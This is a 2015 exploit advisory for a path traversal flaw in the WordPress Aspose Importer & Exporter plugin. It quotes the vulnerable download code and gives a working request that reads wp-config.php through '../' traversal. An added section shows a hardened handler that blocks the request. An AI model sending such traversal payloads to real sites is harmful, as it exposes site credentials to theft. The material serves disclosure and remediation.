#########################################

Exploit Title : WordPress Aspose Importer & Exporter v1.0 Plugin File Download Vulnerability

Exploit Author : Ashiyane Digital Security Team

Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/

Download Link : https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip

Date : 28 / 3 / 2015

Tested On : Windows 8.1 + Kali Linux

#########################################
#########################################

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Exploit:
Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Vulnerable Code :

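<?php
// The 'file' query parameter is taken from the request as-is.
if(isset($_GET['file'])) {
     $file = $_GET['file'];
     // Only the last path component is used for the download name...
     $file_arr = explode('/',$file);
     $file_name = $file_arr[count($file_arr) - 1];
     header ("Content-type: octet/stream");
     header ("Content-disposition: attachment; filename=".$file_name.";");
     // ...but the full, unvalidated path is passed to filesize() and readfile().
     header("Content-Length: ".filesize($file));
     readfile($file);
     exit;
}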

http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File Address]

Examples :  
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
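
Added example, not part of the original advisory or the plugin's code: a hardened form of the download handler above that discards directories in the file parameter, allowlists the name, and confirms the canonical path stays inside one fixed directory. EXPORT_DIR, resolve_download() and the doc/docx extension list are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. EXPORT_DIR is an assumed directory
// holding the only files this endpoint should ever serve.
define('EXPORT_DIR', __DIR__ . '/exports');

// Returns the canonical path of a servable file, or null if the request is rejected.
function resolve_download(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Drop any directory part, treating both separators as path delimiters.
    $name = basename(str_replace('\\', '/', $requested));
    // Allowlist the name and extension (assumed: exported Word documents only).
    // This also rejects "..", empty names, NUL bytes, quotes and CR/LF.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.docx?\z/i', $name)) {
        return null;
    }
    // realpath() resolves symlinks, so containment is checked on the real path.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

if (isset($_GET['file']) && is_string($_GET['file'])) {
    $path = resolve_download($_GET['file'], EXPORT_DIR);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
    exit;
}
```

With this handler, the request shown under Examples is reduced to the name wp-config.php, fails the allowlist, and gets a 404.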

#########################################
#########################################

Discovered by : Rq07

#########################################